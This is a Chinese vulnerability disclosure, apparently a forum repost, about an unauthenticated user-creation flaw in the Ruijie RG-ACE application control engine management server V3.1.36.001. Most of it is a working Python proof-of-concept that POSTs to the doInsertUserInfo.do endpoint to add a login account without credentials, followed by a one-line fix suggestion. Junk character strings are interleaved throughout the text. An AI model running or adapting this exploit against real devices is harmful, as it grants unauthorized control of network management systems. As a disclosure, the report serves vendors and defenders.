锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低), Q4 ]8 S7 X4 c; }" J4 A' X
% H6 ~1 F" G8 B% L0 _/ ]. V+ i
) I& i1 s: _7 s测试的具体版本是 \, O+ U2 x9 `' O+ l4 B
产品名称: 锐捷应用控制引擎& f( ]. n k8 C& q4 g2 {& X
版本号: 3.1.36.001 TC- e- s1 ?* s5 C& H7 e
编译时间: 2011042917309 F% H6 q* @% p1 t5 s
& }- ~& O& o! f4 r& n- K
! @8 T5 v& f( I! Y漏洞证明:
9 F7 j! y/ B- q1 t
" w. I# p4 {$ ]3 {) z# F; F/ o% c; b8 f: \% b2 q
$ l( n. J7 m3 {* G. U9 G3 N* V2 J% I2 ]
7 M; Q0 G4 K$ K$ P8 @7 b& [3 ?
- [2 a! U0 [4 f: Q1 v
执行脚本3 _* E+ }3 W x5 a$ }
#! /usr/bin/env python
& E1 ]4 m7 J- N; |/ D& ]#coding=gbk
' f/ F9 ~3 R& q4 \ n, h6 l/ M#RG-ACE管理服务器 V3.1.36.001# g6 s( d8 A3 _- q9 o) P
import urllib2, urllib,cookielib, G3 L% `2 m2 D/ \/ w
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
3 h# [8 R6 }8 T5 p9 m r+ Popener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))" D) W" ?) ?3 r T8 ^6 `! P
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
/ X$ }4 m; g7 t) y, @, Npost=(("event","userManager.doInsertUserInfo"),. L8 A7 z8 h6 _: x
("useractionname","addButtonValue"),
: `7 i6 u" E9 m2 Q8 w9 @("useropermanager","userManager"),
/ W N, G9 M" C% j("userName","t"), #######账号自己加
4 q. p1 C1 W4 e. t* m9 A0 v("pwd","aaaaaa"),######密码自己加7 c/ k' M. X) y8 `* f% h! A$ y3 ?
("trueName","ad"),
. }- X% X% j# z0 x6 Q("email",""),5 p. @# x" z# v- B! k- x& k* P* E
("mobilePhone",""),: ?+ }9 J K/ k9 O8 Y
("officePhone",""),; }8 s! Z3 f4 F& y% @: z, s& K
("addr",""),: l4 m) K% c. U
("submit","确定"))
- b8 L. v6 |* q ]/ hurllib2.install_opener(opener)
1 b8 }6 X2 [1 x% o" tp=urllib2.urlopen(url, urllib.urlencode(post)).read()4 V( P( c0 E0 J, p3 B8 V5 |
print "Done", W2 u6 S( Y2 |# D
4 V% h# S* n4 g5 s+ A, I, M登录,连接设备
: M) e4 P1 V. m- @! _# }* }+ v: n4 Z' L; H5 c6 {; {9 a; R
8 i" Q& D1 i* ]2 y
L: P: f: ^# h7 g; r/ R1 D: R! g1 f b. O
9 E7 M6 Y5 a- [+ J
默认的管理员admin权限更大点/ p/ u; t" b; l4 d5 s
" a; [% b8 b: I( q2 E( \
! J$ q) D; Y5 Q1 X- H& s- Q$ C
+ b' z# U5 }+ {" p8 k* j7 w
4 t% L/ S+ V8 q6 y& B# _5 m% M3 @6 v2 s& Y0 Y4 ~
修复方案:
0 h& y. k) T; n4 S9 C# h加强对接口的权限验证
9 v7 D- ]' o3 s0 T5 B% M7 ~* Z$ w2 v1 T
|